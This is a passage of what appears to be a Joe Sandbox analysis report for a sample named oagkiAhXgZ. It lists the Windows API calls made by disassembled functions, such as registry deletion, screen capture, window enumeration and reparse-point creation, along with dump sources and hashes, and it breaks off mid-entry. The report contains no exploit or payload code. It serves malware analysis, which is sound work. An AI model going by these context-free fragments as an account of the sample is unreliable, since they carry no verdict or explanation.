                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385AD
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385BA
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00B385C8
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385D7
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00B385E0
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385E7
                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385F8
                                                                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00B3FC38,?), ref: 00B38611
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00B38621
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00B38641
                                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00B38671
                                                                                                    • DeleteObject.GDI32(?), ref: 00B38699
                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B386AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3840717409-0
                                                                                                    • Opcode ID: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
                                                                                                    • Instruction ID: ff2bc5ff9811b92a73743e9ace7b5cd381af7941c91748e0732ce856c9241158
                                                                                                    • Opcode Fuzzy Hash: c68392a251a38c15dbf543eb89628b8f55c34152a450a644f35f03847f7dd728
                                                                                                    • Instruction Fuzzy Hash: A241F975600204BFDB119FA9DC89EAF7BB8FF89711F208059F905E7260DB30A901DB61
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00B11502
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00B1150B
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B11517
                                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B115FB
                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 00B11657
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B11708
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00B1178C
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B117D8
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B117E7
                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 00B11823
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                    • API String ID: 1234038744-3931177956
                                                                                                    • Opcode ID: 7b1bc4be0d7d08249b00b83da3809c918c68608442f657229b8493c959cd282f
                                                                                                    • Instruction ID: 8c5ad28c79aa720c9b8e5e8031159b9e8b970bbc4ddd5b05b5e3f2ef64570fc9
                                                                                                    • Opcode Fuzzy Hash: 7b1bc4be0d7d08249b00b83da3809c918c68608442f657229b8493c959cd282f
                                                                                                    • Instruction Fuzzy Hash: 48D10071A00115DFDB009F69D884BBDB7F6FF45700FA48996E646AB281DB30DD80DB62
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2B6F4
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2B772
                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00B2B80A
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B2B87E
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B2B89C
                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00B2B8F2
                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2B904
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2B922
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B2B983
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B2B994
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                    • API String ID: 146587525-4033151799
                                                                                                    • Opcode ID: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
                                                                                                    • Instruction ID: 59cfa3b45b4b9e76861ac4a6208571a83fee23ef164489f19e29ef57220c9e2f
                                                                                                    • Opcode Fuzzy Hash: a1e3dbc281697352c7f7815844950c23b7becec3ff2eb0bbb8dda203b86d42db
                                                                                                    • Instruction Fuzzy Hash: 3CC1AD34208211AFD714DF14D495F2ABBE5FF85318F14859CF5AA8B2A2CB35EC45CB92
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00B225D8
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B225E8
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00B225F4
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00B22601
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00B2266D
                                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00B226AC
                                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00B226D0
                                                                                                    • SelectObject.GDI32(?,?), ref: 00B226D8
                                                                                                    • DeleteObject.GDI32(?), ref: 00B226E1
                                                                                                    • DeleteDC.GDI32(?), ref: 00B226E8
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00B226F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                    • String ID: (
                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                    • Opcode ID: 3ccf570f18a1ebef9598174830278e776c1f84aae9c98ab28981b98f6ec58db9
                                                                                                    • Instruction ID: 0468a31f6b0769d3ad4b7af101401ca0e79dae15469677c1a9765be8e8b82cfa
                                                                                                    • Opcode Fuzzy Hash: 3ccf570f18a1ebef9598174830278e776c1f84aae9c98ab28981b98f6ec58db9
                                                                                                    • Instruction Fuzzy Hash: 9E61E076D00219EFCF15CFA4D884AAEBBF6FF48310F208569E959A7250D770A941DFA0
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00ADDAA1
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD659
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD66B
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD67D
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD68F
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6A1
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6B3
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6C5
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6D7
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6E9
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD6FB
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD70D
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD71F
                                                                                                      • Part of subcall function 00ADD63C: _free.LIBCMT ref: 00ADD731
                                                                                                    • _free.LIBCMT ref: 00ADDA96
                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    • _free.LIBCMT ref: 00ADDAB8
                                                                                                    • _free.LIBCMT ref: 00ADDACD
                                                                                                    • _free.LIBCMT ref: 00ADDAD8
                                                                                                    • _free.LIBCMT ref: 00ADDAFA
                                                                                                    • _free.LIBCMT ref: 00ADDB0D
                                                                                                    • _free.LIBCMT ref: 00ADDB1B
                                                                                                    • _free.LIBCMT ref: 00ADDB26
                                                                                                    • _free.LIBCMT ref: 00ADDB5E
                                                                                                    • _free.LIBCMT ref: 00ADDB65
                                                                                                    • _free.LIBCMT ref: 00ADDB82
                                                                                                    • _free.LIBCMT ref: 00ADDB9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
                                                                                                    • Instruction ID: 4f7ea926a543a2a22f8b4991ce06f929a89b876ca3ef31f9d3908f1a7f405a2e
                                                                                                    • Opcode Fuzzy Hash: 7d28868e338698166caf376ad6b48eaa2fa987d1074762d58f3180a8002ef85c
                                                                                                    • Instruction Fuzzy Hash: 3A315A326046049FEB21AB38E945B6A7BE8FF50354F15841BE45ADB3A1DA30AC40DB20
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B0369C
                                                                                                    • _wcslen.LIBCMT ref: 00B036A7
                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B03797
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B0380C
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00B0385D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B03882
                                                                                                    • GetParent.USER32(?), ref: 00B038A0
                                                                                                    • ScreenToClient.USER32(00000000), ref: 00B038A7
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00B03921
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B0395D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                    • String ID: %s%u
                                                                                                    • API String ID: 4010501982-679674701
                                                                                                    • Opcode ID: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
                                                                                                    • Instruction ID: d87411b69691b57a733e6b8f332d6a792b65c927e41bb804f83287298f2b101b
                                                                                                    • Opcode Fuzzy Hash: bb13e75ea2ecd9de6f3aa2dd08180aecc06a38c2e661d21e8bb538420651b2de
                                                                                                    • Instruction Fuzzy Hash: 4E91AC71204706AFD718DF64C889FAABBECFF44750F108669F99A92190DB30EA45CB91
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B04994
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B049DA
                                                                                                    • _wcslen.LIBCMT ref: 00B049EB
                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00B049F7
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B04A2C
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00B04A64
                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B04A9D
                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00B04AE6
                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B04B20
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B04B8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                    • String ID: ThumbnailClass
                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                    • Opcode ID: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
                                                                                                    • Instruction ID: 13bc76ba7465fb4f9f6cb2eed9a592567795b8f3cd96ee23bb977ab9810058b4
                                                                                                    • Opcode Fuzzy Hash: 3cf442bf880fa8f2a27a266d47d91161cf3eb6176b01841d20cedd43aae2c0e4
                                                                                                    • Instruction Fuzzy Hash: E7919AB21082059FDB14DF14C985BAA7BE8FF84314F0484A9FE859A1D6EB30ED45CBA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B38D5A
                                                                                                    • GetFocus.USER32 ref: 00B38D6A
                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00B38D75
                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00B38E1D
                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B38ECF
                                                                                                    • GetMenuItemCount.USER32(?), ref: 00B38EEC
                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00B38EFC
                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B38F2E
                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B38F70
                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B38FA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                    • Opcode ID: af7911ac83445bb808e1f690e724adb9a1a88bad4c1e7302c5c5fde5987eabf0
                                                                                                    • Instruction ID: eb332ce1efe2d041a585da8d0ffa6cc87be4f909898e1caf531ba39e88c816d5
                                                                                                    • Opcode Fuzzy Hash: af7911ac83445bb808e1f690e724adb9a1a88bad4c1e7302c5c5fde5987eabf0
                                                                                                    • Instruction Fuzzy Hash: B281B1715043119FDB10DF24D885AAB7BE9FF88314F24099DF99997291DF30D905CBA2
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B0DC20
                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B0DC46
                                                                                                    • _wcslen.LIBCMT ref: 00B0DC50
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B0DCA0
                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B0DCBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                    • Opcode ID: 6dd1f83e456ba4e3d4573e534b558378fc531ed8b10f9f687c72783dbede8c1e
                                                                                                    • Instruction ID: 901ebf4162676aef8f2f443ad2bfb7f31f8f463b339a937e820101e649da0c63
                                                                                                    • Opcode Fuzzy Hash: 6dd1f83e456ba4e3d4573e534b558378fc531ed8b10f9f687c72783dbede8c1e
                                                                                                    • Instruction Fuzzy Hash: B441F2329402047AEB14A7B49D47FFF7BACEF45750F2401AAF900A71D2EB74DA0197A4
                                                                                                    APIs
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CC64
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B2CC8D
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD48
                                                                                                      • Part of subcall function 00B2CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B2CCAA
                                                                                                      • Part of subcall function 00B2CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B2CCBD
                                                                                                      • Part of subcall function 00B2CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B2CCCF
                                                                                                      • Part of subcall function 00B2CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B2CD05
                                                                                                      • Part of subcall function 00B2CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B2CD28
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B2CCF3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                    • Opcode ID: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
                                                                                                    • Instruction ID: 7838cb6903a5f924481f965fa6745113aac2bde0cab1f578c7bcdeff596d1f3a
                                                                                                    • Opcode Fuzzy Hash: dbdb6772e94360bca0512b998d7fe2a87159f2a24b02cc5bc1937023009a40d5
                                                                                                    • Instruction Fuzzy Hash: F5316075901129BBD7208BA5EC88EFFBFBCEF45750F1001A5A909E3150DB749E459BE0
                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B13D40
                                                                                                    • _wcslen.LIBCMT ref: 00B13D6D
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B13D9D
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B13DBE
                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00B13DCE
                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B13E55
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B13E60
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B13E6B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                    • String ID: :$\$\??\%s
                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                    • Opcode ID: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
                                                                                                    • Instruction ID: 448a7ad0957a31ca58e857ff799f133353720dc30d789dc68e9d79f7aec84d91
                                                                                                    • Opcode Fuzzy Hash: 2b97d266fe6d95150cec3dacb2ada46c742945d45a9bf67699e4f7fe94b0e251
                                                                                                    • Instruction Fuzzy Hash: D8317272900219AADB219FA0DC89FEF37FCEF88B00F5041B5F505E61A0EB7497848B64
                                                                                                    APIs
                                                                                                    • timeGetTime.WINMM ref: 00B0E6B4
